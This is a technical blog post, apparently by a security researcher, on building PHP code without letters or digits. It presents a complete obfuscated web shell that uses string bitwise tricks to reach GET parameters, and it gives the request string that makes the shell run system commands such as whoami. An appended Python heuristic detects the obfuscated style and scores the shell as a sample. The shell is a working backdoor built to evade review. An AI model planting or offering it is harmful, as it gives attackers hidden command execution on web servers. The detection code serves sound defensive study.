denjacker

Non alphanumeric code in PHP


So a small PHP shell was tweeted around and it inspired me to investigate a way to execute non-alphanumeric code. First off, I started with the idea of using octal escapes in PHP and constructing the escape. For example, \107 is “G”: if I could construct the “107” and add the backslash to the beginning, maybe I could construct “G”. It worked like this:

$_=+"";

$_=(++$_)+(++$_)+(++$_)+(++$_);

$__=+"";

$__++;

$___=$_*$_+$__+$__+$__+$__+$__+$__+$__;//107

$___="\\$___";

But there was no way to evaluate the escape once it was constructed without using alphanum chars. So I was stumped.

Then I had a brain wave: PHP automatically does a string conversion for arrays and converts them to “Array” when accessed as a string. I had “A”, “r”, “r” etc., but I really needed “GET” in order to create a nice small non-alpha shell.

Onto the second technique, PHP allows you to use bitwise operators on strings :D

'a'|'b';//c!

We can make new characters by combining others, but I only had a limited set to work with. A simple for loop later I combined the characters to create “GET” and thus make our non-alphanum small PHP shell :D

<?

$_="";

$_[+""]='';

$_="$_"."";

$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");

?>

<?=${'_'.$_}['_'](${'_'.$_}['__']);?>

The first part converts a string into an array by attempting to assign to “0” position of the string. Then I make sure the array is a string. Then I use “A” from array with bitwise operators to construct “G”, “E” and “T” using the characters “A”|0x6, “A”|0x5 and “A”^0x15. There you have it, you could even generate non-alpha code without using GET quite easily by producing different characters until you get an eval method.

To call the shell you’d use:

?_=shell_exec&__=whoami

Don’t forget: to analyze PHP code, use RIPS if you ever encounter this in the wild.
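For spotting this style of code during triage, here is an added example that is not part of the original post: a Python heuristic that scores PHP source on the traits the post relies on (almost no alphanumeric characters, underscore-only variables, run-time variable names, bitwise operators on strings, callables pulled from an array). The function names, check names and thresholds are assumptions chosen for illustration.

```python
import re

# Added example (not from the post): heuristic triage of PHP source for the
# non-alphanumeric style shown above. Thresholds are assumptions, tune locally.
PHP_BLOCK = re.compile(r"<\?(?:php|=)?(.*?)(?:\?>|\Z)", re.S | re.I)
CHECKS = {
    # three or more variables named only with underscores: $_, $__, $___
    "underscore-vars": (re.compile(r"\$_+(?![A-Za-z0-9_])"), 3),
    # variable name assembled at run time, e.g. ${'_'.$_}
    "dynamic-variable": (re.compile(r"\$\{[^}]*\.[^}]*\}"), 1),
    # bitwise operator applied to a string literal or string offset
    "string-bitop": (re.compile(r"""(?:\]|["'])\s*[|^&]\s*["']"""), 1),
    # callable taken straight from an array element: $x['_'](...)
    "dynamic-call": (re.compile(r"\]\s*\("), 1),
}

def php_code(source):
    """Concatenate the contents of every <? ... ?> / <?php / <?= block."""
    return "".join(m.group(1) for m in PHP_BLOCK.finditer(source))

def analyze(source, max_ratio=0.2, min_len=20):
    code = php_code(source)
    visible = [c for c in code if not c.isspace()]
    ratio = sum(c.isalnum() for c in visible) / len(visible) if visible else 1.0
    findings = []
    if len(visible) >= min_len and ratio < max_ratio:
        findings.append("low-alnum")
    for name, (pattern, minimum) in CHECKS.items():
        if len(pattern.findall(code)) >= minimum:
            findings.append(name)
    return {"alnum_ratio": round(ratio, 2), "findings": findings}

# Sample 1: the shell exactly as printed in the post. Sample 2: constructed benign page.
SHELL = r"""<?
$_="";
$_[+""]='';
$_="$_"."";
$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");
?>
<?=${'_'.$_}['_'](${'_'.$_}['__']);?>"""
BENIGN = """<?php
$name = htmlspecialchars($_GET['name'] ?? 'guest');
echo "Hello, " . $name;
?>"""

if __name__ == "__main__":
    for label, src in (("shell", SHELL), ("benign", BENIGN)):
        print(label, analyze(src))
```

Treat a hit as a reason to read the file, not as a verdict: ordinary code can trip a single check, while the sample from the post trips all five.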
